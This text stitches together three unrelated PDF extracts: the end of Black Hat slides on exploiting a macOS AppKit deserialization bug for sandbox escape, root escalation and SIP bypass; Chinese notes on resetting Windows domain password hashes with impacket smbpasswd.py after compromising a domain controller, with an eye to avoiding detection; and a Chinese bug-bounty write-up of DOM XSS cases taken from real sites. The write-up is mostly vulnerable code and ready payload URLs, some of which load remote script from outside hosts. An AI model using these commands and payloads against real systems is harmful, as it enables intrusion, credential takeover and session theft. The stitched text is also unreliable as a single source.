Step 2: NSCustomImageRep
1. Call zero-argument methods on deserialized objects
2. Call any method on deserialized objects
3. Create objects not implementing NSCoder
4. Call zero-argument methods on arbitrary objects
5. Call any method on arbitrary objects
6. Evaluate AppleScript
7. Evaluate AppleScript with the AppleScript-Objective-C bridge
8. Evaluate Python
9. Import ctypes
10.Execute code equivalent to native code
Deserialization to arbitrary code execution
Exploitation
Sandbox escape
Window: the app
Contents: openAndSavePanelService
>Open/save panel loaded its saved
state from the same files as the
app!
- Write new object in the app’s own
saved state directory
- Open a panel
- Sandbox escaped!
>Fixed in 11.3: no long shares
directory
Sandbox escape
Exploitation
Privilege escalation to root
>Use the same technique as
“Unauthd - Logic bugs FTW” by
Ilias Morad
>First, find an app with
entitlement:
com.apple.private.AuthorizationServices
containing:
system.install.apple-software
Privelege escalation
>Then, install this package to a
RAM disk
>It runs a post-install script from
the target disk as root
- Target disk may not even have macOS!
- Mounting a RAM disk does not require
root
Privilege escalation
Exploitation
SIP filesystem bypass
>App from the macOS Big Sur beta
installation dmg
>Has the entitlement:
- com.apple.rootless.install.her
itable
>Very powerful entitlement: access
all SIP protected files!
- Heritable as a bonus, so can spawn a
reverse shell
SIP filesystem bypass
>Read mail, messages, Safari
history, etc. of all users
>Grant ourselves permission for
webcam, microphone, etc.
>Powerful persistence (SIP
protected locations, delete MRT)
>Load a kernel extension without
user approval
SIP filesystem bypass: result
The fixes
>In Monterey, apps can indicate if it accepts only secure serialized objects in
its saved state
- Already enabled for Apple’s apps
- Existing apps may want to store objects that do not implement secure deserialization
- Unclear if exploitable when apps don’t use custom serialized objects
>Reported December 4, 2020
>Sandbox escape fixed (CVE-2021-30659) in 11.3 (April 26, 2021)
>Fix introduced in macOS Monterey 12.0.1 (October 25, 2021)
- Not backported to Big Sur or Catalina!
The fixes
Conclusion
>macOS has a security boundary between processes
>Process injection vulnerabilities can be used to break those boundaries
>CVE-2021-30873 was a process injection vulnerability affecting AppKit apps
>We used it to escape the sandbox, privilege escalation, bypassing SIP
>Fixed by Apple in Monterey (only!)
Conclusion
>macOS security keeps adding more and more defensive layers
>Adding new layers to an established system is hard
- Code written 10+ years ago without security requirements is today’s attack surface
>Effort of attackers may not increase with more layers
- Use the same bug for multiple layers or skip layers
Black Hat Sound Bytes
> https://wojciechregula.blog/post/abusing-electron-apps-to-bypass-macos-security-
controls/
> https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html
> https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html
> https://a2nkf.github.io/unauthd_Logic_bugs_FTW/
> https://mjtsai.com/blog/2015/11/08/the-java-deserialization-bug-and-nssecurecoding/
> https://developer.apple.com/documentation/foundation/nssecurecoding?language=objc
> https://github.com/frohoff/ysoserial
> https://github.com/pwntester/ysoserial.net
References | pdf |
1
修改windows hash
⼀般是拿下域控进⾏操作,建议使⽤域管权限修改,不会出现账户过期问题
其他例⼦
如果出现过期问题,可在域控上修改⽤户属性,也可通过dsmod远程修改
总结
# 管理员权限修改
python3 smbpasswd.py test.com/[email protected] -newpass "Test@12345
6666" -altuser administrator -altpass "Test@123" -debug -admin
1
2
Shell
复制代码
smbpasswd.py [email protected]
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971
889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -a
ltuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!'
-admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502
da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6
a2091001d98a913ab
1
2
3
4
5
6
7
Shell
复制代码
2
smbpasswd.py通过纯445利⽤
PS:windows使⽤双引号
通过域管修改下⾯⽤户密码
分析
powershell "Set-ADUser -Identity zhangsan -ChangePasswordAtLogon $false"
# 远程操作
dsquery.exe user -s 192.168.111.146 -u administrator -p Test@123 -name zhan
gsan
dsmod user "CN=zhangsan,CN=Users,DC=test,DC=com" -s 192.168.111.146 -u ad
ministrator -p Test@123 -mustchpwd no -acctexpires never
1
2
3
4
5
Shell
复制代码
smbpasswd.py [email protected]
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971
889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -a
ltuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b
58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!'
-admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502
da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6
a2091001d98a913ab
1
2
3
4
5
6
7
Examples:
Shell
复制代码
3
为啥需要altuser,如下场景⽤户⾃身⽆法修改密码,必须使⽤管理员⽤户修改
实际是通过SAMR协议进⾏操作的,如下不同RPC函数的使⽤场景,上⾯例⼦就是使⽤的第⼀种
python3 smbpasswd.py test.com/[email protected] -newpass "Test@12345
6666" -altuser administrator -altpass "Test@123" -debug -admin
1
Shell
复制代码
4
问题:修改密码正常,但修改hash,可能会提示过期,从⽽⽤户必须修改密码后才能登录,可能会被发
现
这⾥有⼈提了pr,回头看下(发现这个pr很早就merge了,但仍然遇到,那就是操作上⾯有问题了)
https://github.com/SecureAuthCorp/impacket/pull/381
可以在域控上修改属性
微软⽂档找的如下⼀个结构体中有这么⼀个字段 PasswordMustChange ,回头看看有没⽤
hSamrSetInformationUser: 管理员修改成明⽂或hash
hSamrUnicodeChangePasswordUser2:⽤户本身修改成明⽂密码
hSamrChangePasswordUser:⽤户本身修改成新hash
1
2
3
SQL
复制代码
powershell "Set-ADUser -Identity zhangsan -ChangePasswordAtLogon $false"
1
Shell
复制代码
5
这边有个例⼦可以通过 SamSetInformationUser 修改UserAllInformation,只需要将 PasswordMu
stChange 改动下就⾏了
https://github.com/loong716/CPPPractice/blob/master/AddUserBypass_SAMR/AddUserBypass_
SAMR/AddUserBypass_SAMR.c
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/29b54f06-8961-
43fd-8ecb-4b2a8020d474
这边有篇⽂章讲到https://xz.aliyun.com/t/10126
SamrUnicodeChangePasswordUser2修改就可解决过期限制
6
还是这段代码,明⽂修改才会调⽤ hSamrUnicodeChangePasswordUser2 ,但替换回原来hash的
时候,调⽤的是 hSamrChangePasswordUser ,所以会出现过期问题。
这也对应mimikatz⾥的 SetNTLM ( SamrSetInformationUser )重置以及 ChangeNTLM ( S
amrChangePasswordUser )修修改
7 | pdf |
前⾔
在参与BugBounty时,排⾏榜中有⼀些⼈分数很⾼,除了他很勤奋外,还有很好的⾃动化来发现资产中的漏洞,像h1这
种赏⾦平台竞争也很⼤,明显的漏洞⼏乎很少,要不资产独特,要不漏洞点很隐蔽,否则不容易发现,我在⼀开始接触
这个平台,因为xss最好上⼿,所以我花了很多时间在这上⾯,但是反射型xss很容易重复,因为其他⼈也很容易发现,
或者扫到,所以最开始那段时间,我把⽬光集中在Dom Xss上,并且制作了⾃动化来帮助我发现这种类型的漏洞,尽管
国内并不重视Xss,但是国外对于Xss的奖励还算可观,所以对于学习这个漏洞类型来说很有助⼒,因为有钱赚 (^-^),
⽽且还有⼀些师傅不嫌弃的帮助,我⾮常感谢,所以我想分享⼀些⾃⼰在参与BugBounty遇到的Dom Xss,希望对于初
学者有帮助。
(本⽂不包含任何关于如何扫描Dom Xss的内容。)
(很多案例已修复,所以只能从漏洞报告中找漏洞代码,或者通过Wayback Machine来寻找之前的源代码,经过⼀点点删
改。)
(有些案例Dom很复杂也不典型,⽂章只分享⼀些经典案例,在挖洞时可能可以参考。)
(尽管国外对Xss的奖励可观,但Xss依然属于中危级别漏洞,⽐SSRF,RCE,Sql注⼊这些,赏⾦通常还是很低,所以想要在
BugBounty中获得更多收⼊,还是需要关注研究⼀些⾼危害类型漏洞。未来可能会分享关于其他类型的。)
成果
为什么把成果放在最前⾯,因为我说了赚钱是助⼒,或者说动⼒,我是俗⼈,就是为了赚钱,🤣
我收到关于Dom Xss的赏⾦总计在 30000$ 左右,最⼩的 100$ ,最⼤的 3000$ ,⼤概70份报告,90%的结果来⾃⾃动化,
时间⼤概是2年,因为前期在优化改bug,我没有24⼩时天天扫描,我是偶尔导⼊⼀些⽬标来扫描,因为⼈太懒了+三⼼⼆意
+还有其他事情,断断续续的,隔⼀段时间搞⼀会。⾃动化是帮我找到可能的脆弱点,然后⼿动分析很快就可以得到结果。
案例
关于Dom xss,我很早之前还有⼀篇⽂章,那⾥也可以让你了解更多基础。
以下所有案例来⾃真实⽹站。
通常学习Dom Xss,找到的⽂章似乎是很明显的Dom xss。我也发现过,但是遇到的⼏率很⼩。
例如
var url = window.location.href;
var newUrl = 'DjamLanding.aspx';
var splitString = url.split('?url=');
if (splitString.length > 1) {
newUrl = splitString[1];
window.top.location.href = newUrl;
}
else {
// New Url With NO query string
alert('NO query string');
}
window.top.location.href = newUrl;
这种很简单,直接分割 ?url= , 然后来跳转
Payload https://test.com/xss?url=javascript:alert(1)
最常⻅的Case 1
概括:从URL中获取指定参数值,然后写⼊页⾯。
这种类型重点是获取参数的⽅式
1
var getUrlParameter = function getUrlParameter(sParam) {
var sPageURL = window.location.search.substring(1),
sURLVariables = sPageURL.split('&'),
sParameterName,
i;
for (i = 0; i < sURLVariables.length; i++) {
sParameterName = sURLVariables[i].split('=');
if (sParameterName[0] === sParam) {
return sParameterName[1] === undefined ? true : decodeURIComponent(sPara
meterName[1]);
}
}
};
2
function getQueryParamByName(e) {
var t = window.location.href;
e = e.replace(/[\[\]]/g, "\\$&");
var a = new RegExp("[?&]" + e + "(=([^&#]*)|&|#|$)").exec(t);
return a ? a[2] ? decodeURIComponent(a[2].replace(/\+/g, " ")) : "" : null
}
3
new URLSearchParams(window.location.search).get('ParamName')
这3种⽅式的共同点是全部都会解码,前两个调⽤了 decodeURIComponent ,第3个 URLSearchParams 是对URL参数操
作的原⽣⽅法也会解码
由于获取参数会解码,所以如果写⼊没有处理,⼤部分情况都会造成Xss
----- 1
var e = $(".alert.has-icon")
, t = getURLParameter("sca_success") || ""
, n = getURLParameter("sca_message") || "";
"true" == t && "true" == n ? (0 < e.length ? showNotification("Your plan has been up
dated successfully", "success", 5e3) : jQuery.bsAlert.alert({
text: "Your plan has been updated successfully",
alertType: "success"
}),
resetPageURL()) : n && (0 < e.length ? showNotification(n, "error", 5e3) : jQuery.bs
Alert.alert({
text: n,
alertType: "error",
timeout: 15e3
}),
获取参数 sca_message 给 n ,然后通过某种框架显⽰出来,但是没有处理 n ,所以导致Xss
Payload https://test.com/xss?sca_message=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
----- 2
<iframe id="poster-element" class="poster-element" style="width: 100vw; height: 100vh; b
order: 0"></iframe>
const posterElement = document.getElementById( 'poster-element' )
function getField( name ) {
let fname = document.getElementById( name )
if( !fname ) fname = document.getElementById( 'data-' + name )
let val
if( fname ) {
const isCheckbox = fname.matches( '[type="checkbox"]' )
if( isCheckbox ) val = fname.checked
else val = fname.value || fname.content
// check for a hard true (from the checkbox)
if( val === true || (val && val.length > 0) ) return val
else {
val = getURLParameter( name )
if( val && val.length > 0 ) {
if( isCheckbox ) fname.checked = !!val
else fname.value = val
}
}
}
return getURLParameter( name )
}
if( posterElement && !posterElement.src ) {
const posterSrc = getField( 'poster' ) || GLANCE.defaultPoster
if( posterSrc ) {
posterElement.src = posterSrc
posterElement.classList.remove( 'invisible' )
}
else {
posterElement.classList.add( 'invisible' )
}
}
获取参数 poster 值设置为 posterElement.src ,也就是iframe标签src的值
Payload https://test.com/xss?poster=javascript:alert(1)
----- 3
function highlightSearchResults() {
const e = $(".content_block .content_container .content_block_text:last");
layoutData.enableSearchHighlight && highlightSearchContent("highlight", e);
var t = getQueryParamByName("attachmentHighlight") || void 0;
t && $(".content_block_head").after("<div class='infoBox search-attachment-result-bo
x'>Please check the " + layoutData.attachments.toLowerCase() + " for matching keyword '"
+ t + "' search result</div>")
}
after() ⽅法在被选元素后插⼊指定的内容。
获取参数 attachmentHighlight 值给 t ,通过 jQuery after() 写⼊
Payload https://test.com/xss?attachmentHighlight=%3Csvg%20onload=alert(1)%3E
----- 4
这个报告中只有这张图⽚
流程是
dev=params.get("dev") > sessionStorage.setItem("braze-dev-version",dev) >
var version=sessionStorage.getItem("braze-dev-version") > displayDevMessage(version) >
displayDevMessage(c) {var
a=document.createElement("div");a.innerHTML=c;document.body.appendChild(a);
Payload ?dev=%3Cimg%20src=x%20onerror=alert(1)%3E
由于它是储存在 sessionStorage ,然后再读取,所以这可以算是个持久Xss,访问poc后,访问任何加载此js的页⾯依然
会触发Xss
----- 5
let ghSource = getUrlParameter('gh_src');
for (var something in sorted) {
console.log(something);
// let options = 'All Categories' + something;
var sortedReplaced = replaceAll(something.replace(/\s/g, ''), '&', '');
menuHtml.innerHTML += `<li data-filter="${sortedReplaced}" onClick="(function() { ga
('IPTracker.send', 'event','button','click','${sortedReplaced}');})();"><span>${somethin
g}</span></li>`;
// html += `<p class="hide">No data</p>`
html += ` `
let categ = array[something];
html += `<div class="panel ${replaceAll(something.replace(/\s/g, ''), '&', '')}" dat
a-filter="${replaceAll(something.replace(/\s/g, ''), '&', '')}">`
let jobs = categ;
for (let j = 0; j < jobs.length; j++) {
let jobse = jobs[j];
let location = jobs[j].location.name;
let url;
if (ghSource !== undefined) {
// let url =
url = (jobs[j].absolute_url, 't=gh_src=', 'gh_src=' + ghSource);
} else {
url = jobs[j].absolute_url;
}
html += `
<p class="job" data-location="${replaceAll(l
ocation, '&', '')}"><a href="${url}" target="_blank"> ${jobse.title}</a><span>${locatio
n}</span></p>
`
}
html += `</div>`
dataEl.innerHTML = html
}
获取参数 gh_src 通过 replaceAll 传给 url , url 写⼊a标签,但是获取参数解码了,所以还是会造成Xss.
Payload https://test.com/xss?gh_src=xsstest%22%3E%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
常⻅的Case 2
概括:直接把location.href写⼊页⾯
此场景还是很常见的
如果你把 https://www.google.com/xsspath'"?xssparam'"=xssvalue'"#xsshash'" 放⼊浏览器URL栏
你会得到 https://www.google.com/xsspath'%22?xssparam%27%22=xssvalue%27%22#xsshash'%22
从得到的结果来看,浏览器似乎只对 location.search 也就是参数中的单引号⾃动编码
path 和 hash 都不会编码,所以可以利⽤hash逃出任何通过单引号引⽤并写⼊ location.href 或者 location.hash
的地⽅
因为修改 path ⼀般会导致页⾯404,极少数情况下才能使⽤,但是服务端代码在获取某个 path 写⼊页⾯的时候可能会造
成反射型Xss。
----- 1
⽹页分享处,任何分享,⽹页分析创建的log请求 各种需要当前页⾯url的地⽅
像这样
document.writeln("<a href='https://twitter.com/share?text=" + location.href + "'targe
t='_blank' rel='noreferrer noopener'>Twitter</a>");
只需要通过 hash 跳出单引号,就可以添加js事件,根据具体标签具体分析,这⾥是a标签所以很多都可以⽤,onclick为举例
Payload https://test.com/xss#'onclick='alert(1)
----- 2
⼀些表单提交处
createInput: function(a) {
var b = ""
, e = ""
, c = a.fieldPrefix || ga
, d = a.elementId || a.elementName
, f = a.elementClasses && B(a.elementClasses) ? a.elementClasses : []
, g = "object" === typeof a.elementAttributes ? a.elementAttributes :
{}
, h = "button" === a.type || "submit" === a.type || "checkbox" === a.t
ype || "radio" === a.type || "hidden" === a.type
, k = a.justElement || a.collection || "hidden" === a.type || "button"
=== a.type || "submit" === a.type
, l = "password" === a.type && !Bb && a.placeholder ? "text" : a.type
, n = ("checkbox" === a.type && !a.collection || "radio" === a.type &&
!a.collection) && !a.justElement
, m = a.rendererFieldName
, p = a.rendererChildFieldName
, t = Hc && !a.collection;
I(f, "capture_" + d) || f.push("capture_" + d);
h || (e += q.createLabel(a));
a.validation && a.validation.required && f.push("capture_required");
b += "<input ";
a.hide && (b += "style='display:none' ");
b = b + ("id='" + c + d + "' ") + (Oc(g) + " ");
"text" === a.type || "email" === a.type || "password" === a.type || "fil
e" === a.type ? I(f, "capture_text_input") || f.push("capture_text_input") : "checkbox"
=== a.type || "radio" === a.type ? I(f, "capture_input_" + a.type) || f.push("capture_in
put_" + a.type) : "submit" === a.type && (I(f, "capture_btn") || f.push("capture_btn"),
I(f, "capture_primary") || f.push("capture_primary"));
b += "data-capturefield='" + a.name + "' ";
a.collection && (b += "data-capturecollection='true' ");
m && (b += "data-capturerendererfield='" + m + "' ");
p && (b += "data-capturerendererchildfieldname='" + p + "' ");
"checkbox" !== a.type && "radio" !== a.type || !a.elementValue ? a.value
|| "string" === typeof a.displaySavedValue ? (g = a.value,
h = "string" === typeof a.displaySavedValue ? a.displaySavedValue : a.va
lue,
a.displaySavedValue && ed[h] && (g = wd(ed[h]),
"password" === a.type && (l = "password")),
"password" !== a.type && "text" !== a.type && "email" !== a.type || a.er
rors || !t || Ed.push(c + d),
b += "value='" + g + "' ") : a.placeholder && !Bb ? (b += "value='" + wd
(a.placeholder) + "' ",
I(f, "capture_input_placeholder") || f.push("capture_input_placeholde
r")) : b += "value='' " : b += "value='" + wd(a.elementValue) + "' ";
b = b + ("type='" + l + "' ") + ("class='" + f.join(" ") + "' ");
a.subId && (b += 'data-subid="' + a.subId + '" ');
a.placeholder && (b += "placeholder='" + wd(a.placeholder) + "' ");
if (a.checked || a.elementValue && a.value === a.elementValue)
b += "checked='checked' ";
b += "name='" + a.elementName + "' ";
b += "/>";
e = "checkbox" === a.type || "radio" === a.type ? e + q.createLabel(a,
b) : e + b;
a.modify && q.attachModifyEventHandler(a);
a.publicPrivateToggle && (e += q.createPublicPrivateToggle(a));
n && (e += "</div>");
k || (e += q.createTip(a));
a.profileStoragePath && "undefined" === typeof a.value && q.setElementAt
tributeWithLocalStorage(a, c + d, "value");
return e
},
d.appendChild(q.domHelpers.createInput({
elementType: "hidden",
fieldPrefix: c,
elementName: "redirect_uri",
elementId: "redirect_uri_" + b,
elementValue: janrain.settings.capture.redirectUri
}));
根据上⽂ janrain.settings.capture.redirectUri = location.href
所以 janrain.settings.capture.redirectUri 我们可以控制
第⼀段代码虽然看起来眼花缭乱,但是⼤致⼀看就会知道这是在创建input标签,这⼀⼤堆代码根本不重要,重点在于
b += "value='" + wd(a.elementValue) + "' "; b = b + ("type='" + l + "' ")
精简等同于
b += "value='"+location.href+"'type='hidden'"
显然这是给 <input> 标签添加value和type,但是value是单引号引⽤, location.href 已经说过可以跳出单引号, 但是
<input type='hidden'> 的Xss 很鸡肋,不过在 type= 前⾯可以加任何属性,可以先给 type 赋值,浏览器⾃然会忽略
后⾯的 type=hidden 赋值,这样就很容易就可以Xss
Payload https://test.com/xss#'autofocus=''onfocus='alert(1)'type='input
Case 3
概括: XMLHttpRequest 的⽬标url可控,可以控制响应注⼊可以造成Xss的内容
我之前有⼀个⽂章 https://jinone.github.io/bugbounty-a-dom-xss/ 就算⼀个案例
----- 1
$(document).ready(function() {
$('#resetform').on("submit",function(e) {
e.preventDefault();
if(getParameterByName("target")){
var password = $("#resetform").find("input[name='password']");
var referenceID = getParameterByName("referenceID");
var referenceType = getParameterByName("referenceType")
var token = getParameterByName("token");
var target = window.atob(getParameterByName("target"));
var url = "https://" + target + "/api/v1/reset/" + referenceID;
var request = new XMLHttpRequest();
request.open("PUT", url, true);
request.setRequestHeader("Content-type", "application/x-www-form-url
encoded");
request.onreadystatechange = function() {
if(request.readyState == request.DONE) {
var response = request.responseText;
var obj = JSON.parse(response);
if (request.status == 200) {
window.location.replace("thank-you.html");
}else{
document.getElementById("errormsg").innerHTML = obj['Des
cription'];
document.getElementById("errormsg").style.display = "blo
ck";
document.getElementById("errormsg").scrollIntoView();
}
}
}
request.send("password="+password.val()+"&token="+token+"&referenceT
ype="+referenceType);
}else{
document.getElementById("errormsg").innerHTML = "There was a pro
blem with your password reset.";
document.getElementById("errormsg").style.display = "block";
document.getElementById("errormsg").scrollIntoView();
}
return false;
});
});
代码就是要从参数target(base64解密)获取 host 拼接到url⾥⾯ 发送请求 判断响应是否为200 如果不是就会把响应包的
Description json 值写在页⾯
可以把⼀个脚本放在服务器
<?php
header("HTTP/1.0 201 OK");
header("Access-Control-Allow-Origin: https://qwe.com");
header("Access-Control-Allow-Credentials: true");
header("Access-Control-Allow-Methods: OPTIONS,HEAD,DELETE,GET,PUT,POST");
echo '{"Description":"<img/src=x onerror=alert(1)>"}';
?>
由于这个 var url = "https://" + target + "/api/v1/reset/" + referenceID; ,后⾯还有内容
可以使⽤ test.com/xss.php? 把后⾯的忽略掉, 再经过base64编码
Payload https://test.com/reset?target=dGVzdC5jb20veHNzLnBocD8=
----- 2
_h_processUrlArgs: function() {
var
h_search = document.location.search,
h_args,
h_property,
h_i, h_cnt;
if (!h_search) {
return;
}
h_args = h_search.substr(1).split('&');
for (h_i = 0, h_cnt = h_args.length; h_i < h_cnt; h_i++) {
h_property = h_args[h_i].split('=');
switch (h_property[0]) {
case 'h_debug':
this._h_debugMode = true;
break;
case 'weblibFiles':
kio.lib._h_buildDescription.h_weblibFiles.h_path = this._h_getPath(h
_property[1]);
this._h_getFile(h_property[1], 'kio.lib._h_buildDescription.h_weblib
Files.h_files');
this._h_normalizeBuildDescription(kio.lib._h_buildDescription.h_webl
ibFiles);
break;
case 'appFiles':
kio.lib._h_buildDescription.h_appFiles.h_path = document.location.or
igin + this._h_getPath(h_property[1]);
this._h_getFile(h_property[1], 'kio.lib._h_buildDescription.h_appFil
es.h_files');
this._h_normalizeBuildDescription(kio.lib._h_buildDescription.h_appF
iles);
break;
}
}
},
_h_getPath: function(h_url) {
var h_p = h_url.lastIndexOf('/');
if (-1 !== h_p) {
h_url = h_url.substr(0, h_p);
}
return h_url;
},
_h_getFile: function(h_url, h_variableName) {
var h_xhr;
if (window.XMLHttpRequest) {
h_xhr = new window.XMLHttpRequest();
} else if (window.ActiveXObject) {
h_xhr = new window.ActiveXObject('Microsoft.XMLHTTP');
}
if (!h_xhr) {
this.h_reportError('Internal error: Cannot load ' + h_url, 'kLib.js');
return;
}
h_xhr.open('GET', h_url, false);
h_xhr.send(null);
if (h_variableName) {
eval(h_variableName + '=' + h_xhr.responseText + ';');
} else {
eval(h_xhr.responseText);
}
},
从 document.location.search 中通过switch匹配参数名,执⾏对应操作,传⼊参数值为 h_url ,通过xhr获取响应,
然后竟然直接eval,没有任何引号包裹, weblibFiles 和 appFiles 都可以,只需要准备⼀个js地址。
Payload https://test.com/xss?appFiles=//15.rs/
上述案例相当于是⼀些Dom xss的形式,再查找这种类型漏洞,可以多关注。
奇葩案例
----- 1
这个在⼀处oauth
qs: function(e, t, n) {
if (t)
for (var i in n = n || encodeURIComponent,
t) {
var o = new RegExp("([\\?\\&])" + i + "=[^\\&]*");
e.match(o) && (e = e.replace(o, "$1" + i + "=" + n(t[i])),
delete t[i])
}
return this.isEmpty(t) ? e : e + (-1 < e.indexOf("?") ? "&" : "?") + this.pa
ram(t, n)
},
param: function(e, t) {
var n, i, o = {};
if ("string" == typeof e) {
if (t = t || decodeURIComponent,
i = e.replace(/^[\#\?]/, "").match(/([^=\/\&]+)=([^\&]+)/g))
for (var a = 0; a < i.length; a++)
o[(n = i[a].match(/([^=]+)=(.*)/))[1]] = t(n[2]);
return o
}
t = t || encodeURIComponent;
var r, s = e, o = [];
for (r in s)
s.hasOwnProperty(r) && s.hasOwnProperty(r) && o.push([r, "?" === s[r] ?
"?" : t(s[r])].join("="));
return o.join("&")
},
responseHandler: function(e, t) {
var a = this
, n = e.location
, i = a.param(n.search);
if (i && i.state && (i.code || i.oauth_token))
r = JSON.parse(i.state),
i.redirect_uri = r.redirect_uri || n.href.replace(/[\?\#].*$/, ""),
r = a.qs(r.oauth_proxy, i),
n.assign(r);
else if ((i = a.merge(a.param(n.search || ""), a.param(n.hash || ""))) && "s
tate"in i) {
try {
var o = JSON.parse(i.state);
a.extend(i, o)
} catch (e) {
var r = decodeURIComponent(i.state);
try {
var s = JSON.parse(r);
a.extend(i, s)
} catch (e) {
console.error("Could not decode state parameter")
}
}
"access_token"in i && i.access_token && i.network ? (i.expires_in && 0 !
== parseInt(i.expires_in, 10) || (i.expires_in = 0),
i.expires_in = parseInt(i.expires_in, 10),
i.expires = (new Date).getTime() / 1e3 + (i.expires_in || 31536e3),
l(i, 0, t)) : "error"in i && i.error && i.network ? (i.error = {
code: i.error,
message: i.error_message || i.error_description
},
l(i, 0, t)) : i.callback && i.callback in t && (o = !!("result"in i &&
i.result) && JSON.parse(i.result),
d(t, i.callback)(o),
u()),
i.page_uri && n.assign(i.page_uri)
} else
"oauth_redirect"in i && n.assign(decodeURIComponent(i.oauth_redirect));
这有多个可以 Xss的⽅法
responseHandler 中 只要满⾜第⼀个if的条件,通过 location.assign() ⽅法加载⼀个新的页⾯ r
Payload https://test.com/xss?state=
{"oauth_proxy":"javascript:alert(1);//"}&code=xss&oauth_token=xss
第⼆个if 太长没看
如果前两个if都不满⾜,else也可以导致Xss,这是最简单的
Payload https://test.com/xss?oauth_redirect=javascript:alert(1)
但是这个站的waf超级严格,根本绕不过
但是在第⼆个if中 else if ((i = a.merge(a.param(n.search || ""), a.param(n.hash || ""))) &&
"state"in i)
可以看到把 location.hash 也传给了 i ,依然使⽤最后的else内容来触发Xss,由于hash根本不会发送给服务端,所以
waf没⽤。
Payload https://test.com/xss#oauth_redirect=javascript:alert(1)
----- 2
<script type="text/javascript">
window.onload = ()=>{
var e = window.location.search.replace("?", "").split("&");
if (void 0 !== e && null != e && "" != e) {
var t = e[0].split("=");
if (void 0 !== t && t.length > 0) {
var l = t[1];
localStorage.setItem("deploymentJs", l),
n(l)
}
} else {
var o = localStorage.getItem("deploymentJs") ? localStorage.getItem
("deploymentJs") : "https://c.la1-c1cs-ord.xxxxx.com/content/g/js/49.0/deployment.js";
void 0 !== o && null != o && "" != o && n(o)
}
function n(e) {
let t = document.createElement("script");
t.setAttribute("src", e),
void 0 !== e && null != e && "" != e && document.body.appendChild(t)
}
}
</script>
离谱,居然获取第⼀个参数值作为script标签的src值。
由于储存在localStorage 这算是个持久xss 只要⽤户不⾃⼰清除cookie或者访问有参数的页⾯
Payload https://test.com/xss?xss=data:,alert(1)// 或
Payload https://test.com/xss?xss=//nj.rs
----- 3
var query = getQueryParams();
$.each(query, function(key, value) {
window[key] = value;
});
function getQueryParams() {
var qs = document.location.search + '&' + document.location.hash.replace('#', '');
qs = qs.split("+").join(" ");
var params = {},
tokens,
re = /[?&]?([^=]+)=([^&]*)/g;
while (tokens = re.exec(qs)) {
params[decodeURIComponent(tokens[1])] = decodeURIComponent(tokens[2]);
}
return params;
}
这个似乎是想把所有参数和hash中的参数储存在 window 对象中,可是这样可以修改⼀些原有的⼦对象,⽐如 location
Payload https://test.com/xss#location=javascript:alert(1)
⼀般能⽤hash就⽤hash,因为这样不会被waf检测
----- 4
通常eval很容易造成Xss,谨慎使⽤
String.prototype.queryStringToJSON = String.prototype.queryStringToJSON || function() {
var params = String(this) // 上文中this = location.href
, params = params.substring(params.indexOf("?") + 1);
if (params = params.replace(/\+/g, "%20"),
"{" === params.substring(0, 1) && "}" === params.substring(params.length - 1))
return eval(decodeURIComponent(params));
params = params.split(/\&(amp\;)?/);
for (var json = {}, i = 0, n = params.length; i < n; ++i) {
var param = params[i] || null, key, value, key, value, keys, path, cmd, param;
null !== param && (param = param.split("="),
null !== param && (key = param[0] || null,
null !== key && void 0 !== param[1] && (value = param[1],
key = decodeURIComponent(key),
value = decodeURIComponent(value),
keys = key.split("."),
1 === keys.length ? json[key] = value : (path = "",
cmd = "",
$.each(keys, function(ii, key) {
path += '["' + key.replace(/"/g, '\\"') + '"]',
jsonCLOSUREGLOBAL = json,
cmd = "if ( typeof jsonCLOSUREGLOBAL" + path + ' === "undefined" ) jsonCLOSU
REGLOBAL' + path + " = {}",
eval(cmd),
json = jsonCLOSUREGLOBAL,
delete jsonCLOSUREGLOBAL
}),
jsonCLOSUREGLOBAL = json,
valueCLOSUREGLOBAL = value,
cmd = "jsonCLOSUREGLOBAL" + path + " = valueCLOSUREGLOBAL",
eval(cmd),
json = jsonCLOSUREGLOBAL,
delete jsonCLOSUREGLOBAL,
delete valueCLOSUREGLOBAL))))
}
return json
}
第⼀处eval,只是通过if判断是否{}包裹
Payload 1 https://test.com/xss/?{alert(1)}
第⼆处eval,只要在传⼊eval的内容中,想办法让⾃⼰的js可以执⾏就⾏
在本地测试,,传⼊如下js就可以执⾏
if ( typeof jsonCLOSUREGLOBAL["x"]["\\"]);alert(1);//"] === "undefined" )
jsonCLOSUREGLOBAL["x"]["\\"]);alert(1);//"] = {}
所以
Payload 2 https://test.com/xss/?x.\%22]);alert(1);/%2f=1
第3处eval,略。
----- 5
PostMessage Xss,这似乎有很多关于这种类型的⽂章。
Client-Side Prototype Pollution参考 https://github.com/BlackFan/client-side-prototype-pollution 。这
俩个在BugBounty中也⾮常吃⾹。
分享⼀个俩者结合的Xss
起因是
